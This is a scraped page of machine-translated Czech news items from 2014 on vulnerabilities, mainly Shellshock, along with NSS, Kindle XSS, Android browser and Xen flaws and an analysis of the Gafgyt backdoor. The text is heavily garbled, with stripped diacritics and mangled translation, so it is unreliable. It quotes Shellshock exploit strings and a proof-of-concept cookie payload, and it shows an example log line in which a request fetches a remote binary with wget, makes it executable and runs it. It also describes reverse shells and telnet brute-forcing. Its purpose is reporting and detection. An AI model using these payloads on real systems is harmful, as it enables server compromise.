zranitelnosti1 - pbwcz.cz web/zranitelnosti1.htmlfiletype: sh inurl: cgi-bin stránky: [Vaše doména] Tato Google zkontrolovat můj návrat skripty, které používají jiné skořápky

  • Upload
    dohanh

  • View
    237

  • Download
    14

Embed Size (px)

Citation preview

zranitelnosti1

Apple zplaty Shellshock chybu v OS X9.10.2014 ZranitelnostiApple konen vydala aktualizaci zabezpeen pro OS X, kter se zblzka kritick vzdlen sputn kdu Shellshock chyby nalezen v prosted GNU Bash UNIX. Tato aktualizace e jak CVE-2014-6271 problm objevil Stephane Chazelas, stejn jako ten, CVE-2014-7169 pznakem by Tavis Ormandymu. aktualizac zabezpeen byly pro OS X Mavericks , Mountain Lion a Lion uivatel. Podle Ars Technica , nebude za pedpokladu, e patch pro aktuln OS X Yosemite vvoj nebo veejn beta stav, ale bude postavena do ptch ty. Pokud jste ve spchu opravit v systm, budete muset sthnout aktualizaci a implementovat run, protoe jet nebyly zpstupnny realizovat prostednictvm procesu aktualizace obvykle Software (to bude pravdpodobn brzy zmn). Jakmile je aktualizace byla provedena, si mete bt jisti, e byl spn po oteven Terminal aplikace a spuste nsledujc pkaz: bash -version . vrcen informace by mly bt GNU bash, verze 03.2.53 (1) -release (x86_64-apple-darwin13), pokud spustte OS X Mavericks. slo v poslednm etzci by mlo bt darwin12 nebo darwin11 , v zvislosti na tom, zda sputn Mountain Lion i Lion. Zatmco spolenost pracuje na aktualizaci, mluv zdraznil , e drtiv vtina uivatel OS X nejsou ohroeny. "S OS X systmy jsou bezpen standardn a nen vystaveno vzdlench vyuije bash, pokud uivatel konfigurovat sluby pokroil UNIX," bylo uvedeno. Intego Derek Erwin napsal uiten vysvtlen tchto dvou ppadech, v nich Mac systmy uivatel jsou ohroeny vyuit vady - "obou ppadech okraj", poznamenv, e "pravdpodobn vyadovat rove odbornch znalost, kter lovk konfigurace svj et jako takov nplasti vyut pomrn jednodue." Poznamenal tak, e vidli proof-of- Koncept vyuv na Mac OS X, a vysvtlil, jak kody tonci mohli dlat na zranitelnm systmu.

Wordpress databze zranitelnost8.10.2014 ZranitelnostiJi v roce 2012, jsou jemn lid stojc za konferenci BruCON oznmila, e od vydn sv populrn akce 2013, zvltn rozpoet bude pidleno na podporu tvr mylen pijt s projekty, kter budou mt prospch INFOSEC komunitu. Projekt byl pojmenovn 5by5 a ve svm prvnm roce byly tyi npady financovny 5000 EUR.

V letonm roce Ryan Dewhurst a tm za populrn WPScan open source ern skky WordPress zranitelnosti pout finann prostedky z 5by5 projektu k nastaven databze WPScan zranitelnosti , on-line verze WPScan datovch soubor slou k detekci WordPress Core plugin a tma zranitelnosti. Kad poloka zranitelnost v databzi specifikuje doten verz, poskytuje extern reference s vce podrobnost o chyb v otzce, stejn jako poskytuje klasifikaci zranitelnosti (in-house WPVDB ID, CVE, CWE a OWASP Top 10 referenn). Databze m tak API je k dispozici pro nekomern pouit. Mylenkou projektu je vyut stvajc depozit Wordpress bezpenostnch chyb postaven v WPScan a aby tyto otzky vce viditeln a pstupn pro WordPress sprvc, uivatel a celkovou bezpenostn komunity. autora : Berislav Kucan, provozn editel Help Net Security.

CSAM: Patch a dostat pw0ned (ne OR).7.10.2014 Zranitelnosti"Patch tak rychle, jak je to mon" Zd se, e jet dal spolen bezpenostn praxe vedouc k sti zkzu. Zazdny stroje neme bt hacknut snadno, take to me trochu pomoci s "bezpenost". Ale na druhou stranu, jak insecuredo chcete, aby vae zazen, aby se za elem podpory nejnovj a nejlep zplatovn nstroje.

Pkn pbh z Lyalc:

" Ped nkolika lety, zranitelnost skenovn vrobn prosted poprv nachz asi polovina kritickch produknch server v tomto platebnm prosted se funkce Ochrana soubor systmu Windows zakzat prostednictvm kle registru. "

Ok. To by mi sehnal trochu zjizvenou taky. Ochrana soubor systmu Windows (WFP) je skvl vlastnost, aby ty Win2k a 2K3 systmy trochu bezpenj, a ujistte se, hacking je dost tk, e nkter skript kiddies nemus obtovat. Lb se mi to, a nechtl, aby to, e mte vypnut ve nhle.

"Neteba dodvat, e procesy reakce na incidenty kopl velmi rychle.? Bhem poten analzy, bylo zjitno, e doten servery mli? Nplast na kritickou platebn komponenty, nkolik tdn ped skenovn zranitelnosti.? Tento software, z globln prodejce platebnch prostedk, je pouvn velkou st odvtv platebnho styku, co je pirozen cl pro malware a rootkit dodavatel. "

Ok. To by m taky naden (a vzruen nikdy nebyly dobr v oblasti bezpenosti. Mm rd sv bezpenostn operace bt nudn, ...). Platebn systmy, myslm, e jsem slyel o pr ppadech, kdy napadl. Ano, zd se, e oprava. Ale co nplast? Jak dlouho byli zraniteln ped pouitm nplasti? A dobe, obrana do hloubky je urena pro lidi, kte nemohou dlat incidenty odpov jako Lyalc coninues?:

... Msto neml nainstalovn FIM, ani se skenovn zranitelnosti byly provedeny dve. [FIM: Forefront Identity Manager]

Tak co se stalo? Jak se to me mon bt falen pozitivn?

Po tto linie vyetovn zjistili, e opravn balek Instalan bylo zakzn WFP, ale zanedbvaj znovu povolit funkci, take servery nchyln na zmny systmovch soubor.

Ah! Pltek.?

Jen slovo o zplaty, v tdnu, kdy jsme se zrovna udlal s dobrou adu vysoce kritickch nouzovch zplat pro Shellshock: pestat obvat o rychlosti sm. Ztratte. Pemlejte o tom, Shellshock a heartbleed: Neme opravit podnik dostaten rychle. Co budete potebovat msto, je:

dobe promylen zplatovn proces. Jak jsme na zplatovn, jak jsme se vyhnout stanov systm, jak zajistit, aby se nplast dostal skuten pouity?komplexn inventarizace. Nelze zajistit (nebo nplast), co nemtePevn ovldac prvky pro detekci tok a vyuvny systmy. Muste viditelnost st, aby bylo mon detekovat toky a co je dleitj, vyuvanch systm.

Shellshock: Vce informac o uvolnn CVE-2014-6277 a CVE-2014-6278. Tak: M Windows maj problm Shellshock?6.10.2014 ZranitelnostiMichal Zalewski se zveejovat vce podrobnost o dv zranitelnosti objevil v dsledku Shellshock. Pouil fuzzer objevit jak zraniteln msta, a nyn zveejnila PoC vyuv pro ob strany. [1]

Chcete-li zjistit, zda jste zraniteln, Michal body tohoto testu etzec:

foo = '() {echo not patched; } 'Bash-c foo

Rychl test ukazuje, up-to datum OS X, CentOS a Ubuntu jako nejsou ohroeny.

Prvn z nich, CVE-2014-6277, je vce "tradin" pouit neinicializovan pamti. Ve vtin ppad, bude to jen zpsob havrii. Nicmn, to me bt tak vyuit k dosaen sputn libovolnho kdu. Ve sv podstat je to opt zpsobeno tm, jak jsou funkce analyzovn v promnnch prosted, take by to bylo vyuiteln pes HTTP poadavk.

Druh, CVE-2014-6278, je ble k pvodnmu Shellshock chyby. PoC exploit napsal Michal je:

HTTP_COOKIE = '() {_; }> _ [$ ($ ())] {Echo ahoj mami; id;} 'bash-c:

Stejn jako prvn chyba, parser je zmaten o tom, kde definice funkce skon, a provede kd v {}.

Koncem minulho tdne, blog post o podobnou chybu v systmu Windows navrhl nkter, kter prosted Windows je zraniteln stejn [2]. Tato chyba zabezpeen je vak ponkud odlin. Nen pedn jin skopky plodil od pvodn. Tak v systmu Windows, je jet mn pravdpodobn ne v Unixu mt cgi-bin skripty volat pmo shell. Jedinou realistickou vyut vektor ve Windows i nadle prosted, jako je cygwin, kter instaluj bash v systmu Windows.

[1] http://lcamtuf.blogspot.com/2014/10/bash-bug-jak-jsme-nakonec-cracked.html [2] http://thesecurityfactory.be/command vstikovn-windows.html

Bash "Shellshock" chyba: Kdo potebuje na starosti?4.10.2014 ZranitelnostiJak se dalo oekvat, tonci zaali vyuvn GNU Bash "Shellshock" vzdlen sputn kdu chyba (CVE-2014-6271), ke kompromisu systmy a infikovat je s malware. Po zveejnn sv existence, Alien Vault zaala b nov modul v jejich lkadla a ek na tonky, jejich clem je tuto chybu zabezpeen zneut. "Mli jsme nkolik hit v poslednch 24 hodinch. Vtina z nich jsou systmy se sna zjistit, zda je systm zraniteln a jednodue odeslat pkaz ping zpt ke stroji tonka," sdlen vzkumnk Jaime Blasco. "Krom tchto hit jsme nali na tonky, kte pouvaj tuto chybu zabezpeen zneut instalovat dva rzn kusy malware na obti." V prvn ad, uiten zaten je ve form ELF binrnch, kter otisky prst infikovan systmy, oteve backdoor do systmu, a me systm asti na DoS tok a tok hrubou silou. Zscaler a Kaspersky Lab maj vce informac o tomto toku, kter jak se zd, zamit Nginx a Apache webov servery nakonfigurovny pro pouit mod_cgi . Ve druhm ppad , uiten zaten je repurposed IRC bot, kter se pipoj k IRC serveru a ek na pkazy. Mezitm, Google vzkumnk Travis Ormandymu nael druh zpsob (CVE-2014 a 7169) pro zneuit tto chyby, jako nplast pro upevnn CVE- 2014-6271 byla nepln a me jet dovolit nkter znaky, kter maj bt vstknut do clovho prosted. To je chyba, kter webov server administrtoi obvat nejvce, a to zejmna v ppad jejich servery b Bash z cgi-bin , poznamenal SANS ISC CTO Johannes Ullrich. On tak poskytoval rady o tom, jak sprvci mohou chrnit sv servery (tak zde ). "Webov servery nejsou jedinou aplikac v ohroen," varuje Trend Micro. "SSH mohou bt tak citliv na Shellshock. V tomto okamiku libovoln server, Unix / Linux OS, kter pouv Bash jsou v nebezpe. Ve vchozm nastaven je vtina z nich pout Bash, s nktermi vjimkami. Napklad FreeBSD vchoz shell tcsh." Pravideln uivatel mohou povzdech levou, protoe nen mnoho koncovch zazen jsou zraniteln. "Aktuln daje ukazuj, e asi 10% uivatel PC pouvat njakou formu Linux nebo Max OS X. Tyto operan systmy mohou bt nchyln k Shellshock, i kdy i zde tba je mnohem obtnj , "oni poznamenal . "Pro koncov uivatele, me nejvt obavy dobe bt vyuije pes nepoctiv DHCP servery b na potenciln zasaench routery a aktivn Bash je pouvn klienty DHCP k nastaven systmu,. klient pipojen k nepoctivm serveru DHCP me skonit bhat kodliv pkazy na jejich systm. To lze velmi snadno provst pomoc kodlivch otevench Wi-Fi st. Doporuujeme uivatelm, aby se zvl opatrn, z nich WiFi st pro pipojen, ale to je ji soust nejlepch dlouhodobch postup. " Android zazen a iOS zazen (nen-li jailbroken) nejsou ovlivnny chyby. "Koeny a upraven zazen, kter nyn b na * NIX varianty (a, jako vsledek, Bash) me bt ovlivnna," poukzali. Apple m zatm k vydn opravu pro OS X, ale podle na Apple mluv, drtiv vtina uivatel OS X nejsou ohroeny. "S OS X systmy jsou bezpen standardn a nen vystaveno vzdlench vyuije bash, pokud uivatel konfigurovat sluby pokroil UNIX. Pracujeme rychle poskytnout aktualizaci softwaru pro nae pokroil uivatele systmu UNIX." Konen, nkte Internet vc zazen postaven na vloen verze Linuxu jsou zraniteln, a chyba me bt zneuita k lano je do botnetu. Bohuel, zplatovn nkterch z tchto zazen je problematick, jak se nkte z prodejc jsou velmi laxn, pokud jde o vytven a vydvn aktualizac zabezpeen. "Tato chyba bude mt vliv nepoznateln adu vrobk a systm, ale za podmnek, kter vyut to je docela neobvykl pro vzdlen vyuit, " uklidnil . Rapid7 je Jen Ellis, a vyjdil nzor, e riziko rozshlch tok ve voln prod je men ne Hearbleed Flavio De Cristofaro, VP of Engineering profesionlnm vrobkm, spolenosti Core Security, souhlas: "Od mj pohled, Heartbleed byl trochu vce znepokojujc vzhledem k postiench st a masivn pouit SSL. Bash je k dispozici na vtin * nix systm, a majc Bash oto hostitele zraniteln, ale ne nutn vzdlen zneuiteln. jsou nutn dal podmnky, aby . dovolit vzdlen ohrozit bezpenost hostitele podstat muste bt schopni aplikovat pkazy do flmu ". "Uivatel mus opravit Nkte lid se doporuuje, aby uivatel zkontrolovat, zda jsou nebo nejsou b CGI -., ale to je naprosto nesta. C ++, Python, PHP a vechny ostatn aplikace, kter umouje bash hovory jsou ovlivnny. Ostatn aplikace podporujc protokol DHCP, SSH (restriucted shell), mohou bt rovn ovlivnny, a to nejen ze vzdlenho toku, ale tak z mstn eskalaci prv pohledu. Take nplasti, nplasti, nplasti, "rad. "Opravy jsou ji k dispozici pro vtinu znmch systm, nebo budou k dispozici velmi brzy. Nkte dodavatel publikoval brzy opravu, kter byla nepln, a oni mli zveejnit novou opravu dnes. Ponechme-li stranou * nix distribuce, budou spolenosti potk se znanmi problmy, pokud potebujete opravit star systmy nebo systmy zaloen na embedded zazen, jako jsou kamery, router a ICS, pokud jsou sputny Bash. Natst, e by nemla bt pli ast, protoe Bash je obvykle pli tk pro systmy, jako je, e. "

Kritick chyba SSL oprava v Firefox, Thunderbird, Chrome3.10.2014 ZranitelnostiJste-li uivatelem Mozilla Firefox, Thunderbird nebo SeaMonkey, byste mli implementovat nejnovj zplaty vydan spolenost co nejdve, protoe opravit kritickou chybu, jej vyuit me vst k spnmu toku Man-in-the-middle. chyba postihuje vechny verze knihovny Mozilla NSS, a dl to nchyln k variant podpisu padln toku dve vydan Daniel Bleichenbacher, Mozilla vysvtlila . "To je zpsobeno mrnm parsovn ASN.1 hodnot zapojench do podpisu a mohla by vst k utven RSA certifikty." Zvanost vady svd i fakt, e US-CERT vydal vstrahu o tom, ve kterm oni tak varoval, e zraniteln Mozilla NSS knihovna je asto zahrnuta do tetho-party software, vetn Linuxovch distribuc, Google Chrome, Google OS a dal. Spolenost Google vydala aktualizaci zabezpeen, kter opravuje chybu, pro jej Chrome stabiln kanl, take uivatel Chrome mli aktualizovat stejn. Doufejme, e zplaty pro ostatn software obsahujc tuto chybu brzy nsledovat. Dal technick informace o vadu lze nalzt zde . chyba byla hlena jak Antoine Delignat-Lavaud, bezpenostn vzkumnk v INRIA Pai v tmu Prosecco, a Advanced Threat Research tmu na Intel bezpenosti.

Kritick chyba Bash oteve UNIX, Linux, OS X na toky3.10.2014 ZranitelnostiBash "Shellshock" chyba ( CVE-2014-6271 ) byla objevena minul tden Unix / Linux odborn Stephane Chazelas, a jeho existence byla zveejnna ve stedu. Ovlivuje Bash , interpret pkaz ptomn na mnoha unixovch systm a systm zaloench na IT: rznch Linuxovch distribuc a Apple OS X. To me bt zneuita tonky, kte se sna potlait nebo omezen bypass prosted spoutt pkazy shellu, tedy neoprvnn, kodliv kd. vada je povaovna za kritickou pro mnoho dvod. Za prv, poet postiench zazen je obrovsk: myslte, e o vech webovch serverech (vetn tch, Apache) a embedded zazen (routery, atd), b na systmu Linux, potae Mac ... poet me velmi dobe bt ve stovkch miliony. Za druh, US-CERT a NIST dal maximln skre (10,0), jak pro dopad a vyuitelnosti. Vyuit vady me vst k neoprvnnmu zveejnn informac, proti neautorizovanmu pstupu do systmu a modifikaci, a naruen sluby, a postup vyuit je velmi krtk a jednoduch:. To trv jen pr dk kdu Podle CloudFlare bezpenostn inenr Ryan Lackey , chyba je ji vyuvn v prod run, a je to jen otzkou asu, kdy nkdo vytvo erva a automatizuje tok a umouje skkat z jedn zraniteln systmu do druhho. Nakonec, chyba byla ptomna cel lta, ale to je nemon ci, zda to byl vyuit pi tocch dv. Sean Gallagher sdl snadn zpsob, jak zjistit, zda v systm Linux nebo Unix je zraniteln, a dobrou zprvou je, e mnoho populrnch distribuc Linuxu ji vydal patch . " GNU Bash oprava je k dispozici i pro zkuen uivatele a sprvce k provdn, "US-CERT uvedeno v oznmen. Zatmco oprav sm je snadn a me bt provedena rychle, e hlavn problm pro sprvce bude vystopovat vechny zazen, kter jsou zraniteln, a to zejmna pokud budou jejich st jsou obrovsk a sloit. "Na rozdl od Heartbleed, kter ovlivnila pouze uritou verzi OpenSSL tento bash chyba byla po dlouhou, dlouhou dobu. To znamen, e existuje spousta starch zazen v sti zraniteln ve vztahu k tto chyb. ada systm, kter je teba oprava, ale nebude, je mnohem vt, ne Heartbleed, " poznamenal errata zabezpeen na Robertem Grahamem. "Existuje jen mlo teba spchat a opravit tuto chybu. Vae primrn servery jsou pravdpodobn nchylnj k tto chyb. Nicmn, vechno ostatn asi je. Skenovn st pro vci, jako Telnet, FTP, a star verze Apache (masscan je velmi uiten pro toto). Cokoli, co reaguje je pravdpodobn star pstroj potebovat bash opravu. A protoe vtina z nich neme bt oprava, jste pravdpodobn v hji. " Domc uivatel, kte mus dlat skutek sami se doporuuje pravideln kontrolovat webov strnky vrobc, jejich zazen (napklad smrovae), kter vlastn pro aktualizace zabezpeen k een problmu, a k proveden tchto aktualizac, jakmile budou moci. To plat i pro uivatele OS X stejn.

Xen Security Advisory - XSA 108 - http://xenbits.xen.org/xsa/advisory-108.html2.10.2014 ZranitelnostiXen vydal poradenstv a souvisejc opravu k een problmu, kter umouje "buggy nebo kodliv HVM hosta zhroucen hostitele nebo st data tkajc se ostatnmi hosty nebo hypervisor sm."

Xen 4.1 a novj jsou zraniteln, tak systmy x86 jsou zraniteln. ARM systmy nejsou ohroeny.

Pouit nplasti je tento problm vyeen.

tonci zneuvaj chybu Shellshock

30.9.2014 ZranitelnostiVzkumnci ji zaznamenali nkolik tok na webov strnky a servery za pouit kritick chyby Shellshock.

Zraniteln software pouvaj miliny serverovch jednotek, piem vzkumnci zatm hovo o tiscovkch napadench server. M se vak za to, e poet tok poroste s tm, jak se bude internetem it kodliv kd. tonci napaden potae vyuvaj napklad k vytven botnet.

Chyba nazvan Shellshock byla objevena v shellu Bash, kter je iroce pouvn pedevm unixovmi operanmi systmy a v Linuxu a nachz se i v mnoha jejich variantch. V ohroen jsou tedy i uivatel systmu Mac OS X od Applu, pestoe spolenost tvrd opak a uivatele chce uklidnit uvolnnm rychl opravy.

Podle Jaimeho Blascoa z bezpenostn firmy AlienVault tonci pouvaj skenovac programy, pomoc kterch se sna najt napadnuteln potae. V ppad pozitivnho nlezu jim pak nic nebrn v instalaci malwaru.Zaujal vs tento lnek? Pehled nejzajmavjch zprv zskte odebrnm naeho newsletteru

Kontrola, kterou mohou tonci po ovldnut potae zskat, in ze Shellshocku potenciln vt problm, ne jakm byla zranitelnost Heartbleed objeven v dubnu letonho roku. Heartbleed pouze tonkm zpstupnil urit informace, zatmco dky Shellshocku mohou zskat kontrolu nad vaimi servery a weby, uvedl Kasper Lindegaard z firmy Secunia.

O zvanosti cel situace svd i to, e britsk vlda zveejnila prohlen, ve kterm uvedla, e pro tamn kyberbezpenostn sloky m Shellshock nejvy prioritu. Podobn postup se oekv i od americkch a kanadskch ad. S chybou se njakm zpsobem sna vypodat i velk technologick firmy, jako jsou Amazon, Google nebo Akamai.

XSS chyba umouje Amazon tu nos29.9.2014 ZranitelnostiOpakujc se XSS chyba v Kindle Library Amazon, tedy "Sprva vaeho Kindle" webov aplikace, me bt zneuita tonky, kte se sna unst Amazon tu uivatel, nmeck vzkumnk varoval . Aby tento tok fungoval, mus bt uivatel naplil do pidn e-book, kter obsahuje konkrtn skript v jeho metadat svho Kindle knihovny a potom otevete webovou strnku Kindle Library. A to bude hotov, kd je automaticky sputn, a tonk me sklzet Amazon tu cookies, kter pak lze pout k zskn pstupu k tu obti. Aby j dokzal svou pravdu, Mussler vytvoil soubor Proof-of-Concept, kter obsahuje skript v nzvu metadat a dala k dispozici ke staen, take ostatn mohou ovit sv tvrzen. Ale zd se, e chyba nen nic novho. On nejprve objevil v listopadu 2013 a oznm Amazon to. Tm Information Security spolenosti fixn, ale pro zatm neznmho dvodu znovu chybu v nov (nejnovj) verze "dit svj Kindle" web app. Mussler varoval Amazon opt o existenci chyby, ale neslyel zpt od nich za dva msce, co ho vedlo k tomu, aby se informace zveejn. chyba ovlivuje kadho, kdo pouv Kindle knihovnu Amazon pro ukldn e-knihy, nebo dodat je do Kindle, ale uivatel, kte stahuj pirtsk e-knihy z tet strany Zdroje jsou urit ve vtm nebezpe ne tm, nkup knih od Amazonu. Kdy Mussler zpotku nael chybu, on byl tak testovn Calibre e-book aplikace pro sprvu, kter nkte pouvaj jako alternativa k Kindle knihovny Amazon, a zjistil, e je tak zraniteln. Natst pro uivatele, Calibre, chyba byla opravena v rekordnm ase.

Kritick Android Browser chyba ohrouje soukrom uivatel29.9.2014 ZranitelnostiZatkem tohoto msce, bezpenostn vzkumnk Rafay Baloch se vydala k proof-of-concept exploit, kter vyuv zranitelnosti v bezpenostnm mechanismem se systmem Android prohlee a me umonit tonkovi sklize citliv uivatelsk data. "Tm, e malforming si javascript: handler URL s pedazen null byte, tonk me vyhnout stejnho pvodu politiky (SOP), bezpenostn kontroly prohle Android Open Source platforma (AOSP) Prohlee, "Tod Beardsley, Rapid7 inenr, vysvtlil . "Co to znamen, libovolnou webovou strnku (eknme, jeden . zen spammer nebo pion), me nahldnout do obsahu jakkoliv jin webov strnky Pedstavte si, e jste el do tonk mst, kdy jste mli svj webmail oteven v jinm okn - tonk by se mohl krbat vae e-mailov data a zjistit, co vai prohle vid. h, mohl by zachytit kopii cookie a unst vai relaci zcela a st a pst webmail vam jmnem. " "Zatmco AOSP prohle m" byl zabit off "od spolenosti Google, je velmi populrn, a to i na modernch zazench pouvanch sofistikovan uivatele, kte preferuj legln prohle na Google Chrome, Firefox, Dolphin, nebo jinch prohle, "Beardsley zdraznil a dodal, tak to, e tm vechny ni-end pedplacench telefon z hlavnch vrobc a dopravci jsou stle dodvny s to nepodporovan prohle a pre-4.4 stav na Androidu. Tm Rapid7 vydala Metasploit modul pro vyuit chybu, a podle Baloch, Google potvrdil, e se pracuje na opravy pro Android verze ped poslednm (v4.4 , tedy KitKat). Jedinou otzkou nyn je, jak pesn se maj na mysli, aby se zasadila tuto opravu. Jak Peter Bright poznamenal , AOSP Browser je obvykle aktualizovn pouze aktualizac operanho systmu. "Vasn dostupnost Android aktualizac zstv problematickm bodem pro operan systm, take i kdy Google vyvj opravu, to me tak bt k dispozici pro ty, kte skuten Potebuji to, "podotkl. V souasn dob mohou uivatel chrnit tm, e upust Android prohle a zat pouvat alternativn ten, kter je urit nebude zaloena na stejnm kdu: Firefox, Opera a Chrome.

"Bash" (CVE-2014-6271), zranitelnost - Q & A26.9.2013 Zranitelnosti

Co je to "bash" zranitelnost?

"Bash" zranitelnost, ve skutenosti popsn jako CVE-2014-6271, je extrmn vkonn zranitelnost vzhledem k jeho vysok dopadu a snadnost, s n me bt vyuit. tonk me jednodue spoutt pkazy na systmov rovni, se stejnmi oprvnnmi jako dotench slueb.

Ve vtin pklad na internetu prv te, tonci jsou na dlku to na webov servery hosting CGI skripty, kter byly napsny v bash nebo pedvn hodnot shell skript.

V dob psan tohoto lnku, chyba ji byla pouita pro nekalmi mysly - infikuje zraniteln webov servery s malware, a tak toky hacker. Nai vzkumnci se neustle sbrat nov vzorky a projevy infekce na zklad tto zranitelnosti; a dal informace o tomto malware budou brzy zveejnna.

Klovou vc pochopit, je to, e chyba nen vzn na konkrtn slubu, napklad Apache nebo Nginx. Spe zranitelnost spov v bash shellu tlumonka a umouje tonkovi pidat pkazy na rovni systmu promnnch prosted bash.

Jak to funguje?

Budu pouvat stejn pklady, kter jsme vidli v rad a proof-of-concept kd, kter byly publikovny, vysvtlit, jak to funguje. Mte-li skript CGI na webovm serveru, tento skript automaticky nate nkter promnn prosted, jako je napklad IP adresa, verzi prohlee a informace o mstnm systmu.

Ale jen si pedstavte, e byste mohli nejen projt tto bn systmov informace na skript CGI, ale me tak ct, skript spoutt pkazy na systmov rovni. To by znamenalo, e - bez nutnosti jakkoli poven na serveru - jakmile mte pstup k CGI skript by to ten promnn prosted; a pokud tyto promnn prosted obsahovat vyuvat etzec, skript by tak spustit pkaz, kter jste zadali.

Co jej in jedinenm?

Tato chyba zabezpeen je uniktn, protoe je to velmi snadn zneut a dopad je neuviteln tk - v neposledn ad proto, e z stky zranitelnch cl. To nen jen vliv na webov servery, ovlivuje veker software, kter pouv interpret bash a te data, kter mete ovldat.

Vdci se tak sna zjistit, jestli ostatn tlumonci, jako je PHP, JSP, Python nebo Perl, jsou tak ovlivnny. Ddepending o tom, jak se pe kd, nkdy interpret skuten pouv bash vykonvat urit funkce; a pokud je to v ppad, me se stt, e ostatn tlumonci by mohly bt tak pouity k vyuit CVE-2014-6271 zranitelnost.

Dopad je neuviteln vysok, protoe existuje mnoho embedded zazen, kter pouvaj CGI skripty - napklad smrovae, domcch spotebi a bezdrtovch pstupovch bod. Oni jsou tak zraniteln a v mnoha ppadech obtn opravit.

Jak rozen je to?

To je velmi tk ct, ale vme, e z naich zpravodajskch systm, kter lid zaali rozvjet vyuije a ervy pmo za informace zranitelnost byla zveejnna - vdci i whitehat a blackhat skenovn Internet pro zraniteln servery.

Je pli brzy na to vdt, jak rozen je to, ale vm, e z mho vlastnho vzkumu, e existuje velk mnostv webovch server se systmem CGI skripty, a jsem si jist, e budeme tak mnoho dalch typ zneuit vyvjeny, e zamit se na mstn soubory a sov dmony. Tam byly diskuse tkajc se jak OpenSSH a DHCP klienty, kte se nchyln k toku stejn.

Jak mohu zkontrolovat, zda mj systm / web byl ovlivnn?

Nejjednodu zpsob, jak zkontrolovat, zda je v systm zraniteln je otevt bash-shell na vaem systmu a spuste nsledujc pkaz:

1"env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

V ppad, e shell vrt etzec "zraniteln", mli byste aktualizovat v systm.

Tak tam jsou nstroje pro odborn publikum tam venku, kter mohou bt pouity k oven, zda v server je ovlivnn touto chybou.

Poradenstv o tom, jak vyeit tento problm

Prvn vc, kterou muste udlat, je aktualizovat sv bash verze. Rzn distribuce Linuxu nabzme opravy tto chyby zabezpeen; a akoli ne vechny patche se ukzala bt zcela inn, zplatovn je prvn vc. Sluby jako Heroku vytlaila opravy, kter budou auto-plat do 24 hodin, ale vvoji mohou donutit aktualizace taky.

Pokud pouvte njak IDS / IPS Chtl bych tak doporuujeme pidat / naten podpisu za to. Mnoho veejnch pravidel byly zveejnny.

Tak zkontrolujte nastaven webserveru. Pokud existuj njak CGI skripty, kter nepouvte, zvate jejich zakzn

Je hrozbou pro on-line bankovnictv?

Tato zranitelnost je aktivn vyuvn na clov servery hostovan na internetu. Dokonce i nkter pracovn stanice se systmem Linux a OSX jsou zraniteln, ale tonk by bylo jet teba najt zpsob toku, kter bude pracovat na dlku proti va pracovn ploe. Proof of concept clen * nix stanice dhcp klienty byl proputn, ale vtina politik stanice dhcp procesu zabrnit akcm tento druh vyuit ve vchozm nastaven.

Exploit pokusy, kter jsme pozorovali, se zamuj na serveru zranitelnosti a stahovn DDoS roboty pro dal DDoS toky. Je pravdpodobn, e servery hosting PII a manipulaci s citlivmi obchodnka daje jsou napadeni, stejn, ale my jsme jet pozoroval. Existuj obchodnci, kter bohuel nemaj opravu rychle.

Mohu zjistit, zda nkdo zneuil tuto proti mn?

Doporuujeme prohlen protokol HTTP a zkontrolujte, zda je nco podezel. Pkladem nebezpenho vzoru:

1192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"

Tam jsou tak nkter patche pro bash, kte se pihlauj kad pkaz, kter je pedn do interpretu bash. To je dobr zpsob, jak zjistit, jestli nkdo zneut v pota. To nezabrn nkomu zneuit tto chyby zabezpeen, ale bude protokolovat akce tonkm v systmu.

Jak vn je hrozba?

Tato chyba je velmi nebezpen opravdu, ale ne kad systm je zraniteln. Mus bt splnny zvltn podmnky pro webov server, kter maj bt vyuity. Jednm z nejvtch problm je, e te, kdy jsou nplasti zveejnny budou vdci hledat jin zpsoby, jak vyut bash, prozkoumat rzn podmnky, kter mu umouj bt vyuit, atd Take nplast, kter pomh zabrnit vzdlen sputn kdu, nelze dlat nic proti , napklad soubor pepsat. Take tam bude pravdpodobn ada patch a mezitm systmy jsou stle zraniteln.

Je to nov Heartbleed?

No, je to mnohem jednodu pro cybercriminal vyut ne Heartbleed. Tak v ppad Heartbleed, cybercriminal mohl ukrst pouze data z pamti, doufaj, e najdou nco zajmavho. Naproti tomu, bash zranitelnost umouje plnou kontrolu nad mnohem monho systmu. Take by se mohlo zdt, e je mnohem nebezpenj.

Me bt pouit v budoucch APT tok?

To by mohly bt pouity pro budouc vvoj malware, samozejm. kodlivm by mohly bt pouity pro automatick testovn infrastruktury pro takov chyby, infikovat systmu nebo toku ji jinm zpsobem.

Shellshock a jeho inovtoi26.9.2013 Zranitelnosti

Krtce po zveejnn Bash chyby nzvem " Shellshock "jsme vidli prvn pokusy zloinc Chcete-li vyut tto rozen zranitelnosti tak znm jako CVE-2014-6.271 .

Nejnovj pokusy, kter vidme zskat kontrolu nad internetovm serverm sta vytvoit novou instanci bash a pesmrovat ji na vzdlen server naslouch na uritm portu TCP. To je tak znm jako reverzn-connect-shell. Zde je pklad toho, jak se zd, e tok na webserver logu:

shellshock_reverse-shell_ortloff

tonk naslouch na IP adresu 195.xx.xx.101 na TCP portu 3333 , zatmco pvod toku je IP adresa 94.xx.xx.131 . Chcete-li zskat kontrolu nad serverem s touto metodou, dn extern binrn soubory jsou zapojeny.

V dalm probhajcm toku zloinci pouvaj speciln vytvoen HTTP poadavek k vyuit Bash zranitelnosti k instalaci Linuxu backdoor na serveru obti. Jsme detekci malware a jeho varianty jako Backdoor.Linux.Gafgyt.

Binrn obsahuje dv napevno IP adresy. Prvn z nich se pouv pouze oznmit zloince o nov spn infekce. Druh IP adresa se pouv jako pkaz-a-dic server (C & C), komunikovat pmo s malware bc na infikovan webserver.

Nsledujc obrzek ukazuje pklad, jak tato komunikace me vypadat takto:

shellshock_traffic-example_ortloff

V souladu 1 malware odele zprvu "Ahoj" a k, e tonk, kter architektura byla binrn zkompilovan pro - zde je to x86.

shellshock_hello-message_ida_ortloff

Nezvisle pkaz zaslanch tonky, backdoor pole " PING "dost kadch 30 sekund, co je odpov s" PONG "ze serveru (pro lep itelnost Odstranili jsme nkter z PING / PONG -pairs z ve uvedenho pkladu ).

Pkazy zanaj vdy " ! * ". Prvn pkaz vidme v tomto ppad je " skener na "pkaz v souladu 10. To k binrn skenovn nhodn IP rozsahy pro hostitele pijmn telnet na portu TCP 23. Pokud se takov hostitel pokus pihlsit pomoc napevno seznam spolench vchozch kombinac uivatel / hesla.

shellshock_verylitte_dict_ortloff

